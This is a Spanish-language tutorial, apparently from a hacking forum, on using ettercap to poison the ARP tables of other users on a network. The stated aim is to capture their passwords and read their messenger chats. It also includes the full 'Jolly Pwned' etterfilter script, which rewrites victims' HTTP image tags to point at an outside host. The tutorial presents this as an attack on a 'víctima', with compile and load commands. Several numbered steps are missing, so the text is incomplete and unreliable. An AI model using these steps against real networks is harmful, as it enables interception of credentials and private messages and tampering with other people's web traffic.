Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Esta es una guia bsica sobre la utilizacin de ettercap. Este programa que nos permite sniffar el trfico
de red y obtener as las contraseas escritas por otros usuarios de nuestra red, adems tambin permite
leer, por ejemplo, las conversaciones del messenger u otros programas de mensajera instantnea.
1 - Primero tenemos que descargar el ettercap, la ultima versin es la 0.7.3 y
esta disponible tanto para windows como para linux:
Windows:
http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/
Linux:
http://ettercap.sourceforge.net/download.php
o (en el caso de Ubuntu)
2 - Lo instalamos.
Si tienes la versin para compilar de linux:
# ./configure
# make
# make install
Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en
cuenta que vamos a utilizar una tcnica llamada Man In The Middle (MITM) y lo que haremos sera que
todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos
desconectamos sin detener el ataque MITM nuestra vctima se quedara sin conexin por un tiempo,
mientras se reinician las tablas arp.
9 - Pestaa Mitm>ARP Poisoning. Ahora marcamos la pestaa "Sniff remote connections" y
pulsamos "Aceptar".
Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el
script.
http://www.irongeek.com/i.php?page=security/ettercapfilter
El script es el siguiente:
############################################################################
#
#
# Jolly Pwned -- ig.filter -- filter source file
#
#
#
# By Irongeek. based on code from ALoR & NaGA
#
# Along with some help from Kev and jon.dmml
#
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833
#
#
#
# This program is free software; you can redistribute it and/or modify
#
# it under the terms of the GNU General Public License as published by
#
# the Free Software Foundation; either version 2 of the License, or
#
# (at your option) any later version.
#
#
#
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
msg("Filter Ran.\n");
}
Ahora modificamos la direccin de las imgenes por las que nosotros queramos, por ejemplo la de
portalhacker.net, quedara as:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img
src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
replace("IMG SRC=", "img
src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
msg("Filter Ran.\n");
}
Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.
Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez
all ponemos y se compilara el filtro:
etterfilter imagen.filter -o imagen.ef
Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
/usr/share/ettercap
Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaa filters->load
a filter.
Una vez aqu seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro
aplicado y las imgenes que vea la victima sern sustituidas por las que nosotros queramos.
Autor: Aetsu
Fuente: http://foro.portalhacker.net/